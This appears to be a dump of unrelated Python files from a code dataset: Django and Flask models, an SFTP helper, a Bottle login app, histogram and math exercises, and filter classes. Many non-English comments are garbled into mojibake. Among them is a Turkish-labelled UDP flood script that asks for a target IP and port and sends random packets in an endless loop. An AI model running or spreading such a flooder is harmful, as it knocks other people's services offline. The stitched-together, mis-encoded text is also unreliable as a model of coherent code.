Django ใฎๆจๆบใฏ __unicode__ ใ ใใpython 3.x ใใใฏใใใฉใซใใง unicode ๅฏพๅฟใใฆใใใฎใง __str__ ใซใชใใ
"""
return self.title
def num_posts(self):
"""
็ดไปใใฆใใ Post ใฎไปถๆฐใ่ฟใใ
"""
return sum([t.num_posts() for t in self.thread_set.all()])
def last_post(self):
"""
ๆๆฐ Post ใ่ฟใใ
"""
# TODO N + 1 ใซใชใฃใฆใใใไฟฎๆญฃใๅฟ
่ฆใ
if self.thread_set.count():
last = None
for t in self.thread_set.all():
l = t.last_post()
if l:
if not last or l.created > last.created:
last = l
return last
class Thread(models.Model):
title = models.CharField(max_length=60)
created = models.DateTimeField(auto_now_add=True)
creator = models.ForeignKey(User, blank=True, null=True)
forum = models.ForeignKey(Forum)
class Meta(object):
ordering = ['-created']
def __unicode__(self):
return unicode(self.creator) + " - " + self.title
def num_posts(self):
"""
็ดไปใใฆใใ Post ใฎไปถๆฐใ่ฟใใ
"""
return self.post_set.count()
def num_replies(self):
"""
่ฟไบๆฐใ่ฟใใ
* ๆๅใฎ Post ไปฅๅคใ่ฟไบๆฐใจใชใใ
* ใชใฎใง Thread ใซ็ดไปใใฆใใ Post ใฎ็ทๆฐ - 1 ใงๆฑใใใใใ
"""
return self.post_set.count() - 1
def last_post(self):
"""
ๆๅพใซๆ็จฟใใใ Post ใ่ฟใใ
"""
if self.post_set.count():
return self.post_set.order_by("created")[0]
class Post(models.Model):
title = models.CharField(max_length=60)
created = models.DateTimeField(auto_now_add=True)
creator = models.ForeignKey(User, blank=True, null=True)
thread = models.ForeignKey(Thread)
body = models.TextField(max_length=10000)
def __unicode__(self):
return u"%s - %s - %s" % (self.creator, self.thread, self.title)
def short(self):
"""
ๆฅไป
"""
return u"%s - %s\n%s" % (self.creator, self.title, self.created.strftime("%b %d, %I:%M %p"))
short.allow_tags = True
def profile_data(self):
p = self.creator.userprofile_set.all()[0]
# TODO avatar ใฎๆถใๅฟใใ
# ็นใซๅฝฑ้ฟใฏใชใใใใชใฎใงใจใใใใใฏไฟฎๆญฃใใชใใ
return p.posts, p.avatar
class UserProfile(models.Model):
posts = models.IntegerField(default=0)
user = models.ForeignKey(User, unique=True)
def __unicode__(self):
return unicode(self.user)
def create_user_profile(sender, **kwargs):
"""
ใฆใผใถไฝๆๅพใUserProfile ใไฝๆใใใ
"""
u = kwargs["instance"]
if not UserProfile.objects.filter(user=u):
UserProfile(user=u).save()
post_save.connect(create_user_profile, sender=User)
|
12,922 | cf1a04f763967f5d6d4be9c58f2f17116c9eeaee | import sys
import os
import time
import socket
import random
from datetime import datetime
datetime = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
os.system("clear")
os.system("DDoS Saldฤฑrฤฑsฤฑ Baลlatฤฑlฤฑyor")
print()
print("Fetih Tim Tarafฤฑndan")
print()
ip = raw_input("Karลฤฑ IP : ")
port = input("Port : ")
os.system("clear")
os.system("DDoS Baลlatฤฑlฤฑyor")
print("[ ] 0% ")
time.sleep(10)
print("[+++++ ] 25%")
time.sleep(10)
print("[++++++++++ ] 50%")
time.sleep(10)
print("[+++++++++++++++ ] 75%")
time.sleep(10)
print("[++++++++++++++++++++] 100%")
time.sleep(5)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print("%s Paketi รzerinden %s Portuna Gรถnderildi:%s" % (sent, ip, port))
if port == 65534:
port = 1
|
12,923 | bf313bc5df68de326970467a3418efad48089004 | import paramiko
import os
import stat
# ๅฎไนไธไธช็ฑป๏ผ่กจ็คบไธๅฐ่ฟ็ซฏlinuxไธปๆบ
class Linux(object):
# ้่ฟIP, ็จๆทๅ๏ผๅฏ็ ๏ผ่ถ
ๆถๆถ้ดๅๅงๅไธไธช่ฟ็จLinuxไธปๆบ
def __init__(self, ip, username, password, timeout=30):
self.ip = ip
self.username = username
self.password = password
self.timeout = timeout
# transportๅchanel
self.t = ''
self.sftp = ''
# ้พๆฅๅคฑ่ดฅ็้่ฏๆฌกๆฐ
self.try_times = 3
# ่ฐ็จ่ฏฅๆนๆณ่ฟๆฅ่ฟ็จไธปๆบ
def connect(self):
self.t = paramiko.Transport(sock=(self.ip, 22))
self.t.connect(username=self.username, password=self.password)
self.sftp = paramiko.SFTPClient.from_transport(self.t)
# ๆญๅผ่ฟๆฅ
def close(self):
self.t.close()
# ๅ้่ฆๆง่ก็ๅฝไปค
def send(self, cmd):
pass
# getๅไธชๆไปถ
def sftp_get(self, remotefile, localfile):
print(remotefile, " ==> ", localfile)
self.sftp.get(remotefile, localfile)
# putๅไธชๆไปถ
def sftp_put(self, localfile, remotefile):
print(localfile, " ==> ", remotefile)
self.sftp.put(localfile, remotefile)
def sftp_mkdir(self, remotedir):
try:
self.sftp.stat(os.path.dirname(remotedir))
except Exception as e:
self.sftp_mkdir(os.path.dirname(remotedir))
try:
self.sftp.stat(remotedir)
pass
except Exception as e:
print("mkdir ", remotedir)
self.sftp.mkdir(remotedir)
# put directory
def sftp_put_dir(self, localdir, remotedir):
for root, dirs, files in os.walk(localdir):
print("localdir = ", localdir)
print("remotedir = ", remotedir)
print("root = ", root)
remote_home = remotedir + \
root.replace(os.path.dirname(localdir), "").replace("\\", "/")
# print("remote_home = ", remote_home)
self.sftp_mkdir(remote_home.replace("\\", "/"))
# for dir in dirs:
# self.sftp_mkdir((remote_home + "/" + dir).replace("\\", "/"))
for file in files:
self.sftp_put(os.path.join(root, file),
(remote_home + "/" + file).replace("\\", "/"))
# get directory
def sftp_get_dir(self, remotedir, localdir):
for root, dirs, files in self.sftp_yield_walk(remotedir):
local_home = localdir + \
root.replace(os.path.dirname(remotedir), "").replace("/", "\\")
if not os.path.exists(local_home):
os.mkdir(local_home)
print("mkdir ", local_home)
for file in files:
self.sftp_get(root + '/' + file,
(local_home + "/" + file).replace("/", "\\"))
def sftp_get_walk(self, remotedir):
dirs = list()
files = list()
all_attrs = self.sftp.listdir_attr(remotedir)
for iter_attr in all_attrs:
if stat.S_ISDIR(iter_attr.st_mode):
dirs.append(iter_attr.filename)
else:
files.append(iter_attr.filename)
return (remotedir, dirs, files)
def sftp_resursion_walk(self, remotedir, all):
sub_root, sub_dirs, sub_files = self.sftp_get_walk(remotedir)
all.append((sub_root, sub_dirs, sub_files))
for sub_dir in sub_dirs:
real_sub_dir = remotedir + "/" + sub_dir
self.sftp_resursion_walk(real_sub_dir, all)
def sftp_walk(self, remotedir):
all = list()
self.sftp_resursion_walk(remotedir, all)
return all
def sftp_yield_walk(self, remotedir):
root, dirs, files = self.sftp_get_walk(remotedir)
yield (root, dirs, files)
for dir in dirs:
real_dir = remotedir + "/" + dir
yield self.sftp_get_walk(real_dir)
for sub_root, sub_dirs, sub_files in \
self.sftp_yield_walk(real_dir):
for sub_dir in sub_dirs:
real_subdir = sub_root + "/" + sub_dir
yield self.sftp_get_walk(real_subdir)
# removedๅไธชๆไปถ
def sftp_remove(self, remotefile):
self.sftp.remove(remotefile)
if __name__ == '__main__':
remote_dir = '/home/yuanwenxing/test'
local_dir = 'E:\code\python\sftp'
host = Linux('xxx', 'xxx', 'xxx')
host.connect()
# open file
# get
# HOME_DIR=r'/home/zhanghenan/source/trunk/'
# fp = open('sftp.INPUT')
# line = fp.readline()
# while(line):
# spLine = line[:-1].split(' ')
# tmpfrom = spLine[0]
# tmpto = HOME_DIR + spLine[1]
# host.sftp_get(tmpto, tmpfrom)
# line = fp.readline()
# put
# HOME_DIR=r'/home/yuanwenxing/XCloud/trunk/'
# fp = open('sftp.INPUT')
# line = fp.readline()
# while(line):
# spLine = line[:-1].split(' ')
# tmpfrom = spLine[0]
# tmpto = HOME_DIR + spLine[1]
# host.sftp_put(tmpfrom, tmpto)
# line = fp.readline()
# ๅฐ่ฟ็ซฏ็xxoo.txt getๅฐๆฌๅฐ๏ผๅนถไฟๅญไธบooxx.txt
# host.sftp_get(remotefile, localfile)
# # ๅฐๆฌๅฐ็xxoo.txt putๅฐ่ฟ็ซฏ๏ผๅนถไฟๆไธบxxoo.txt
# host.sftp_put("E:/code/python/stfp/test_sftp.py",
# "/home/hexianqing/john-y_tmp/abc")
# print(os.path.join(local_dir, "test_sftp.py"))
# print(os.path.join(remote_dir, "abc").replace("\\", "/"))
# host.sftp_mkdir(os.path.join(remote_dir, "bcd/bc").replace("\\", "/"))
# host.sftp_put_dir(local_dir, remote_dir)
# all = host.sftp_walk(remote_dir)
# print(all)
# for root, dirs, files in all:
# print(root)
# print(dirs)
# print(files)
host.sftp_get_dir(remote_dir, local_dir)
# for all in host.sftp_yield_walk(remote_dir):
# print(all)
# host.sftp_yield_walk(remote_dir)
host.close()
|
12,924 | 235236f7856b2cfed302c0eba6785a4a5d0073c0 | """
WSGI app.
"""
import datetime
import os
import time
import bottle
from web import data_proc
PASSPHRASE = os.urandom(2048)
class MainApp:
"""
The main WSGI web app.
"""
def __init__(self, database, timeslice, sample_rate, user, passwd):
self.app = bottle.Bottle()
self.database = database
self.timeslice = timeslice
self.sample_rate = sample_rate
self.user = user
self.passwd = passwd
self._route()
def _route(self):
"""
Setup routes.
"""
self.app.route('/', method="GET", callback=self._index_page)
self.app.route('/login', callback=self._login)
self.app.route('/login', callback=self._do_login, method='POST')
self.app.route('/static/<filename:path>', callback=self._static)
# TODO: add download
# TODO: add statistics.
def _check_login(self, user, pwd):
# FIXME: poor approach.
return user == self.user and pwd == self.passwd
@bottle.view('login.tmpl')
def _login(self):
return None
def _do_login(self):
username = bottle.request.forms.get('username')
password = bottle.request.forms.get('password')
if self._check_login(username, password):
bottle.response.set_cookie("account", username, secret=PASSPHRASE)
bottle.redirect("/")
else:
return "<p>Login failed.</p>"
@bottle.view('index.tmpl')
def _index_page(self):
username = bottle.request.get_cookie("account", secret=PASSPHRASE)
if username:
# FIXME: add more colors here :-)
colors = ['#95b143', '#444', '#95b143', '#444']
utcnow = datetime.datetime.utcnow()
end = time.mktime(utcnow.timetuple())
start = end - self.timeslice
data = data_proc.get_data(self.database,
start,
end,
self.sample_rate)
titles = []
datasets = {}
for key, val in data.items():
titles.append(key)
temp = val
data1 = {'labels': [str(x) for x in
temp.index.strftime('%H:%M:%S').tolist()],
'datasets': []}
i = 0
for column in list(temp):
series = {'label': str(column),
'data': temp[column].tolist(),
'fill': 'false',
'borderColor': colors[i]}
data1['datasets'].append(series)
i += 1
datasets[key] = data1
return {'titles': titles,
'datasets': datasets,
'time': str(datetime.datetime.fromtimestamp(end))}
return bottle.redirect("/login")
def _static(self, filename):
username = bottle.request.get_cookie("account", secret=PASSPHRASE)
if username:
return bottle.static_file(filename, root='views/static/')
elif filename == 'style.css':
return bottle.static_file(filename, root='views/static/')
return bottle.redirect("/login")
|
12,925 | 617e78f9d9bc8f2cd38d834fc80e56f311cc7843 |
add_2 = lambda x: x+2
add_3 = lambda x: x+3
add_5 = lambda x: x+5
add_7 = lambda x: x+7
add_11 = lambda x: x+11
|
12,926 | af0db16a504da2b275bea8b129472970aa55b212 | import numpy as np
import typing
class PoissonHist:
""" Binned data with symmetric Poisson error bars """
def __init__(self, data:typing.Iterable=None, lo=None, hi=None, nbins=100, dens=False, wght=None):
if data is not None:
lo = min(data) if lo is None else lo
hi = max(data) if hi is None else hi
self.data, edges = np.histogram(data, bins=nbins, range=(lo, hi), normed=dens, weights=wght)
self.bins = 0.5 * (edges[1:] + edges[:-1])
norm = self.data.sum() / data.sum()
self.errors = np.sqrt(self.data) * norm
@property
def nbins(self):
return self.data.size if hasattr(self, 'data') else None
@property
def num_entries(self):
return self.data.sum() if hasattr(self, 'data') else 0
@property
def bin_size(self):
return self.bins[1] - self.bins[0] if hasattr(self, 'bins') else None
def __add__(self, rhs):
assert isinstance(rhs, PoissonHist)
assert self.nbins == rhs.nbins
result = PoissonHist()
result.data = self.data + rhs.data
result.bins = self.bins
result.errors = np.sqrt(self.errors**2 + rhs.errors**2)
return result
def __sub__(self, rhs):
assert isinstance(rhs, PoissonHist)
assert self.nbins == rhs.nbins
result = PoissonHist()
result.data = self.data - rhs.data
result.bins = self.bins
result.errors = np.sqrt(self.errors**2 + rhs.errors**2)
return result
def plot_on(self, ax, label='', markersize=4):
ax.errorbar(self.bins, self.data, yerr=self.errors,
marker='o', linestyle='none', markersize=markersize, label=label)
|
12,927 | 21bfbe259d8f5bd948493d35a1de4781dff9120b | from django.db.models.signals import pre_save
from django.dispatch import receiver
from polls.models import Question
from polls.signals.senders import custom_signal
@receiver(pre_save, sender=Question)
def my_handler(sender, **kwargs):
print("pre_save handler called")
@receiver(custom_signal)
def my_custom_handler(sender, **kwargs):
print("custom_handler called") |
12,928 | 0a13c4cd3b7862d79e0e0cc2d0a1c2be62f20521 | from datetime import datetime
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from bluelog.extensions import db
class Admin(db.Model, UserMixin):
"""็ฎก็ๅ็ฑปๆฐๆฎๆจกๅ"""
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(20)) #
password_hash = db.Column(db.String(128)) # ๅฏ็ ๆฃๅๅผ
blog_title = db.Column(db.String(60)) # ๅๅฎขๆ ้ข
blog_sub_title = db.Column(db.String(100)) # ๅๅฎขๅฏๆ ้ข
name = db.Column(db.String(30)) # ็จๆทๅงๅ
about = db.Column(db.Text) # ๅ
ณไบไฟกๆฏ
def set_password(self, password):
"""ๅฏ็ ๅค็ๅ่ฟๅๅๅธๅผ่ตๅผ็ปๅฏ็ ๆฃๅๅผๅญๆฎต"""
self.password_hash = generate_password_hash(password)
def validate_password(self, password):
"""ๅฐๆฅๆถๅฐ็ๅฏ็ ็จๅฏ็ ๆฃๅๅผๆ ก้ช"""
return check_password_hash(self.password_hash, password)
class Category(db.Model):
"""ๅๆๆ ็ญพๆฐๆฎๆจกๅ"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=True) # ๅๆๆ ็ญพๅ็งฐ๏ผไธๅพ้ๅค
posts = db.relationship('Post', back_populates='category') # ๆๆ ็ญพๆ ็ญพๅๆ้๏ผๅๅๅผ็จcategoryๅปบ็ซๅๅๅ
ณ็ณป
def delete(self):
"""ๅ ้คๆ ็ญพ"""
default_category = Category.query.get(1) # ่ฟๅid=1็่ฎฐๅฝ ๏ผไธไธๆฒกๆid=1็ๆ ็ญพๅผๅช๏ผ
posts = self.posts[:] # ่ฟๅๅฝๅๅๆ้
for post in posts:
post.category = default_category
db.session.delete(self)
db.session.commit()
class Post(db.Model):
"""ๅๆ็ฑปๆฐๆฎๆจกๅ"""
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(60)) # ๆ ้ข
body = db.Column(db.Text) # ๅๆๆญฃๆ
timestamp = db.Column(db.DateTime, default=datetime.utcnow, index=True) # ๅๆๆถ้ดๆณ
can_comment = db.Column(db.Boolean, default=True) # ๅฏๅฆ่ฏ่ฎบ๏ผ้ป่ฎคๅฏ
category_id = db.Column(db.Integer, db.ForeignKey('category.id')) # ๆ ็ญพid
category = db.relationship('Category', back_populates='posts') # ๅฏนๅๆๆ ็ญพ็ๅๅๅผ็จๅ
ณ็ณป
comments = db.relationship('Comment', back_populates='post', cascade='all, delete-orphan') # ๅฏน่ฏ่ฎบ็ๅๅๅผ็จๅ
ณ็ณป
class Comment(db.Model):
"""่ฏ่ฎบ็ฑป๏ผ้ๅ ๅๅค๏ผๆฐๆฎๆจกๅ"""
id = db.Column(db.Integer, primary_key=True)
author = db.Column(db.String(30)) # ไฝ่
email = db.Column(db.String(254)) # ไฝ่
็ตๅญ้ฎไปถ
site = db.Column(db.String(255)) # ไฝ่
็ซ็น
body = db.Column(db.Text) # ่ฏ่ฎบๆญฃๆ
from_admin = db.Column(db.Boolean, default=False) # ๆฏๅฆๆฅ่ช็ฎก็ๅ๏ผ้ป่ฎคไธๆฏ
reviewed = db.Column(db.Boolean, default=False) # ๆฏๅฆ้่ฟๅฎกๆ ธ๏ผ้ป่ฎคๆช้่ฟ
timestamp = db.Column(db.DateTime, default=datetime.utcnow, index=True) # ่ฏ่ฎบๆถ้ดๆณ
replied_id = db.Column(db.Integer, db.ForeignKey('comment.id')) # ๆๅ่ช่บซ็idๅญๆฎต
post_id = db.Column(db.Integer, db.ForeignKey('post.id')) # Postๅค้ฎ
post = db.relationship('Post', back_populates='comments') # ไธComment็ๅ
ณ็ณป
replies = db.relationship('Comment', back_populates='replied', cascade='all, delete-orphan') # ๅฏน่ฏ่ฎบ็ๅๅค้
replied = db.relationship('Comment', back_populates='replies', remote_side=[id]) # ๅฎไนidไธบ่ฟ็จ็ซฏ๏ผreplied_idไธบๆฌๅฐ็ซฏ
class Link(db.Model):
"""ๅค้จ้พๆฅ็ฑปๆฐๆฎๆจกๅ"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30))
url = db.Column(db.String(255)) |
12,929 | 052aafb0a92274b39ca7eaaa251394391784839c | #!/usr/bin/env python
import os, os.path
import re
import sys
import yaml
def get_script_path():
return os.path.dirname(os.path.realpath(sys.argv[0]))
# Degrees of freedom
dof = sys.argv[1]
metrics_config_file = os.path.join(get_script_path(), 'anova_latex.yaml')
output_dir = 'formatted'
table_header = """
{{\centering
\\begin{{table}}[h]
{{\small
\\begin{{tabular}}{{|lrr||lrr|}}
& $F(3,{0})$ & $p$ & & $F(3,{0})$ & $p$ \\\\
\hline
"""
table_body = """
\multicolumn{{3}}{{|l||}}{{MR-CT-DA-}} & \multicolumn{{3}}{{|l|}}{{SR-CT-DA-}} \\\\
cl-s1 & ${0}$ & ${1}$ & cl-s1 & ${16}$ & ${17}$ \\\\
di-s1 & ${2}$ & ${3}$ & di-s1 & ${18}$ & ${19}$ \\\\
cl-s2 & ${4}$ & ${5}$ & cl-s2 & ${20}$ & ${21}$ \\\\
di-s2 & ${6}$ & ${7}$ & di-s2 & ${22}$ & ${23}$ \\\\
\hline
\multicolumn{{3}}{{|l||}}{{MR-IT-DA-}} & \multicolumn{{3}}{{|l|}}{{SR-IT-DA-}} \\\\
cl-s1 & ${8}$ & $ ${9}$ & cl-s1 & ${24}$ & ${25}$ \\\\
di-s1 & ${10}$ & ${11}$ & di-s1 & ${25}$ & ${27}$ \\\\
cl-s2 & ${12}$ & ${13}$ & cl-s2 & ${28}$ & ${29}$ \\\\
di-s2 & ${14}$ & ${15}$ & di-s2 & ${30}$ & ${31}$ \\\\
\hline
"""
table_footer = """
\end{{tabular}}
}}
\caption{{{0}}}
\label{{{1}}}
\end{{table}}
}}
"""
anova_pattern = re.compile("F\(\d+,\d+\)=(\d+\.\d+)\tp<(0.\d\d\d)$")
metrics_file = open(metrics_config_file, 'rb')
metrics = yaml.load(metrics_file)
for metric in metrics:
metric_name = metric['name']
metric_caption = metric['caption']
metric_label = metric['label']
print "opening {0}".format("{0}-f.txt".format(metric_name))
input_file = open("{0}-f.txt".format(metric_name), 'rb')
values = []
for line in input_file:
# print line
match = re.search(anova_pattern, line)
if not match:
print("Can't find ANOVA values in input! Aborting.")
sys.exit(1)
values.extend([match.group(1), match.group(2)])
print "len(values): {0}".format(len(values))
print "values: {0}".format(values)
output_text = table_header.format(dof) + table_body.format(*values) + table_footer.format(metric_caption, metric_label)
out_file = open(os.path.join(output_dir, "{0}-f.txt".format(metric_name)), 'wb')
out_file.write(output_text)
out_file.close()
|
12,930 | fca65c0bded19a759f84e4666861263c5f1a9389 | # Lattice paths
# Problem 15
# Starting in the top left corner of a 2ร2 grid, and only being able to move
# to the right and down, there are exactly 6 routes to the bottom right corner.
# RRDD
# RDRD
# RDDR
# DRRD
# DRDR
# DDRR
# How many such routes are there through a 20ร20 grid?
import time
start = time.time()
result = 0
# Until such time as we've reached 20 selections, we have 2^20 possibilities
# Then, the remaining 20 selections depend on the availability of Ds and Rs.
# We have 40 choices, so there are 40! ways of arranging them.
# Each different arrangement has 20! arrangements for down and 20! arrangements
# for right, giving (20!)^2 possibilities or each particular layout.
# Simply divide one by the other.
from math import factorial
side_length = 20
moves = side_length * 2
sl_fact = factorial(side_length)
moves_fact = factorial(moves)
result = moves_fact // sl_fact**2
print ('Result is {}'.format(result))
end = time.time()
print ('Time taken: {:.6f}s'.format(end - start))
|
12,931 | 26777741a2440cb1abc83d6fe6c9b93bce1527a5 | def calculate_sum(number_to_sum):
"""Linear time solution"""
sum = 0
for i in range(1, number_to_sum+1):
sum += i
return sum
# print(calculate_sum(3)) # 3+2+1=6
# print(calculate_sum(11))
def calculate_sum_constant_time(number_to_sum):
"""Constant time solution"""
if number_to_sum % 2 == 0:
pairs = number_to_sum // 2
pair_sum = 1 + number_to_sum
return pairs * pair_sum
else:
number_to_sum -= 1
pairs = number_to_sum // 2
pair_sum = 1 + number_to_sum
return (pairs * pair_sum)+(number_to_sum+1)
# print(calculate_sum_more_performant(4)) # 1 + 2 + 3 + 4 = 5+5 = 10
# print(calculate_sum_more_performant(3)) # 6, 1+2+3
# print(calculate_sum_more_performant(11)) #
def calculate_sum_math_formula(n):
"""Constant time solution"""
return n * (n + 1) // 2
# print(calculate_sum_math_formula(11))
# print(calculate_sum_math_formula(3))
import time
def sum_to_n(n):
# record start time
start = time.time()
# run the function's code
total = 0
for i in range(n + 1):
total += i
# record end time
end = time.time()
return total, end - start
output_template = '{}({}) = {:15d} ({:8.7f} seconds)'
for i in range(1, 10):
print(output_template.format('sum_to_n', i * 1000000, *sum_to_n(i * 1000000)))
|
12,932 | 85b58f70abc83c56d321a50d1af173e1fcf1b920 | #! /usr/bin/python
__author__ = 'tri1@umbc.edu'
# Patrick Trinkle
# Summer 2011
#
# Because I got worried that I would hit the limit of the number of files you're allowed to have; this
# moves the system back into a single flat file database.
#
# UGH: This version double_unescapes more, and doesn't escape anything. I'm assuming the insert python handles this correctly.
import os
import re
import sys
import datetime
import tweetdatabase as td
def usage():
sys.stderr.write("usage: %s <user_list> <database_folder>\n" % sys.argv[0])
def main():
# --------------------------------------------------------------------------
# Did they provide the correct args?
if len(sys.argv) != 3:
usage()
sys.exit(-1)
startTime = datetime.datetime.now()
user_file = sys.argv[1]
database_folder = sys.argv[2]
# --------------------------------------------------------------------------
# Read in the database files and write out the giant database file.
with open(user_file, "r") as f:
for line in f:
id = re.search("<id>(\d+?)</id>", line)
if id == None:
sys.stderr.write("ah!, bailing here\n")
sys.exit(-1)
# get it ready for insertion
user_id = int(id.group(1))
path = td.getPath(database_folder, user_id)
print user_id
try:
os.unlink(path)
except Exception:
pass
# --------------------------------------------------------------------------
# Done.
print "total runtime: ",
print (datetime.datetime.now() - startTime)
if __name__ == "__main__":
main()
|
12,933 | e707ee4deae23ab1fcdb5c38012c1403b659a805 | import seamless
from seamless.core import macro_mode_on
from seamless.core import context, cell, transformer, pytransformercell, link
with macro_mode_on():
ctx = context(toplevel=True)
ctx.cell1 = cell().set(1)
ctx.cell2 = cell().set(2)
ctx.result = cell()
ctx.tf = transformer({
"a": "input",
"b": "input",
"c": "output"
})
ctx.cell1_link = link(ctx.cell1)
ctx.cell1_link.connect(ctx.tf.a)
ctx.cell2.connect(ctx.tf.b)
ctx.code = pytransformercell().set("""
import time
time.sleep(3)
c = a + b
""")
ctx.code.connect(ctx.tf.code)
ctx.result_link = link(ctx.result)
ctx.tf.c.connect(ctx.result_link)
def callback():
print("Equilibration complete")
ctx._get_manager().on_equilibrate(callback)
ctx.cell1.set(10)
for n in range(5):
ctx.equilibrate(1)
print(ctx.status(), ctx.result.value)
ctx._get_manager().on_equilibrate(callback)
ctx.cell1.set(12)
for n in range(5):
ctx.equilibrate(1)
print(ctx.status(), ctx.result.value)
|
12,934 | 5a451ae4be8bf2b593c465274e48ad01a044eb07 | # ๅ่กจๆจๅฏผๅผไฝ็จๆฏไฝฟ็จ้ดๅ็่ฏญๆณๅๅๅๅปบไธไธชๅ่กจ
nums = [i for i in range(10)]
points = [(x,y) for x in range(5, 9) for y in range(1, 4)] |
12,935 | 3bb3268458a581261463f4c9a8bc80b28687dfaf | import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
# ๅฐๆไปถๅฏผๅ
ฅ
file_path = "IMDB-Movie-Data.csv"
df = pd.read_csv(file_path)
# ็ป่ฎกๅ็ฑป็ๅ่กจ
temp_list = df["Genre"].str.split(",").tolist() # ๅฐๆไธๅ่พนๆ [[],[],[]]่ฟ็งๅฝขๅผ
# print(temp_list)
# ๅป้ๅนถไธๅ่กจๅ
genre_list = list(set([i for j in temp_list for i in j]))
# print(temp_list)
# ๆ้ ๅ
จไธบ0็ๅ็ฑปๅ่กจ
# | A | B | C |
# | 0 | 0 | 0 |
# | 0 | 0 | 0 |
# | 0 | 0 | 0 |
# ไพๅฆไธ้ข่ฟไธช่กจๆ ผ๏ผๆฏไธ่กไปฃ่กจไธไธช็ตๅฝฑๅฏนๅบ็ๅ็ฑป๏ผ่ฆๆณ็ฅ้ๆไธชๅ็ฑปๅฏนๅบ็ๆป็็ตๅฝฑๆฐ้๏ผๅช้่ฆๅฏนๅ่ฟ่กๆฑๅๅณๅฏ
zeros_df = pd.DataFrame(np.zeros((df.shape[0], len(genre_list))), columns=genre_list)
# print(zeros_df)
# ็ปๆฏไธช็ตๅฝฑๅบ็ฐ็ๅ็ฑปไฝ็ฝฎ่ตๅผ1
for i in range(df.shape[0]):
zeros_df.loc[i, temp_list[i]] = 1
# ็ป่ฎกๆฏไธชๅ็ฑป็็ตๅฝฑ็ๆฐ้ๅ
genre_count = zeros_df.sum(axis=0)
# print(genre_count)
# ๅฏน็ปๆ่ฟ่กๆๅบ
genre_count = genre_count.sort_values()
print(genre_count)
_x = genre_count.index
_y = genre_count.values
# ็ปๅพ
plt.figure(figsize=(20, 8), dpi=40)
plt.bar(range(len(_x)),_y)
plt.xticks(range(len(_x)), _x)
plt.show()
|
12,936 | 77563f5d47c2bb1b98dedd69fca428a87b9c5bc7 | from os import path, makedirs, getcwd
from glob import glob
from runHgammaSelector import processHg
from pprint import pprint
debug = False
first = True
#for variation in [("nom", 0), ("up", 1), ("down", -1)]:
for btagVariation in [("nom", 0)]:
for phSFvariation in [("nom", 0), ("up", 1), ("down", -1)]:
baseDir = path.join(getcwd(), "organize_smallifications")
#categories = ["backgrounds", "signals", "data"]
categories = ["signals"]
catDirs = {}
for category in categories:
catDirs[category] = path.join(baseDir, category)
pprint(catDirs)
outDir = baseDir.replace("smallifications", "DDs_btag-%s_phSF-%s" % (btagVariation[0], phSFvariation[0]))
if not path.exists(outDir):
makedirs(outDir)
print "catDirs", catDirs
for catDir in catDirs:
catOutDir = path.join(outDir, catDir)
inputFiles = glob("%s/%s/*.root" % (baseDir, catDir))
if not path.exists(catOutDir):
makedirs(catOutDir)
for inputFile in inputFiles:
if first:
print "about to call the first processHg"
processHg(inputFile, inputFile.replace("smallified", "ddTree").replace("smallifications", "DDs_btag-%s_phSF-%s" % (btagVariation[0], phSFvariation[0])), False, False, btagVariation[1], phSFvariation[1])
first = False
elif not debug:
processHg(inputFile, inputFile.replace("smallified", "ddTree").replace("smallifications", "DDs_btag-%s_phSF-%s" % (btagVariation[0], phSFvariation[0])), True, True, btagVariation[1], phSFvariation[1])
|
12,937 | eb4dfb4bdb3773f1aba571fabf8adbf601b59879 | #03.Recebe um valor em minutos, retorna o equivalente em horas e minutos.
def hora_minutos(min):
h = min // 60
m = min % 60
return "%d:%d" %(h,m)
print(hora_minutos(300))
|
12,938 | b597c9edc98c237cef55654020918354a52b4118 | import django_filters
from django import forms
from .models import BookPath, Category, Book
class BookPathFilter(django_filters.FilterSet):
name = django_filters.CharFilter(lookup_expr='iexact')
description = django_filters.CharFilter(lookup_expr='icontains')
author = django_filters.CharFilter()
category = django_filters.ModelMultipleChoiceFilter(
queryset=Category.objects.all(), widget=forms.CheckboxSelectMultiple)
followers = django_filters.NumberFilter(label='With more than X followers',
field_name='follow_count', lookup_expr='gt')
steps = django_filters.NumberFilter(label='With at most X steps', field_name='steps', lookup_expr='lte')
o = django_filters.OrderingFilter(
fields=(
('name', 'name'),
('author', 'author'),
('category', 'category'),
('follow_count', 'follow_count'),
('steps', 'steps'),
),
field_labels={
'follow_count': 'Followers',
'steps':'Steps',
}
)
class Meta:
model = BookPath
exclude = []
class BookFilter(django_filters.FilterSet):
title = django_filters.CharFilter(lookup_expr='iexact')
author = django_filters.CharFilter(lookup_expr='icontains')
publisher = django_filters.CharFilter(
field_name='publishers', lookup_expr='icontains')
number_of_pages = django_filters.NumberFilter(label='Less than X pages',
field_name='number_of_pages', lookup_expr='lt')
paths = django_filters.NumberFilter(label='Included in at least X paths', field_name='paths', lookup_expr='gte')
o = django_filters.OrderingFilter(
fields=(
('title', 'title'),
('author', 'author'),
('number_of_pages', 'number_of_pages'),
('paths', 'paths'),
),
field_labels={
'number_of_pages': 'Pages',
'paths': 'Paths in which the book appears',
}
)
class Meta:
model = Book
exclude = ['isbn_10', 'isbn_13', 'cover']
|
12,939 | 7041c6ed956cb1a78f7da2f167d8112769784fff | # recover, segment remove it.q
import os
import re
import math
import textgrid
import traceback
import string
import pandas as pd
from SWG_utils import compile_pattern, timestamp_convert, output_clauses_csv, create_clauses_csv
def read_lex_table(lex_table_path): # TODO: is this necessary? at all? check the other available read_lex_table method
if lex_table_path.endswith(".xlsx"):
lex = pd.read_excel(lex_table_path, index_col=None, header=0)
else:
lex = pd.read_csv(lex_table_path, index_col=None, header=0)
lex.dropna(axis='columns', how='all', inplace=True)
print(lex.columns)
# lex.drop(['word_POS'], axis=1, inplace=True)
# print(lex.columns)
return lex
# TODO : check how much is overlapped with clauses extract and see if we can merge some functionalities.
def create_rel_clauses_extract(extract_path, tg_path, lex_table, pos_tagger):
if not os.path.exists(extract_path): # if the csv does not exist, create the csv
create_clauses_csv()
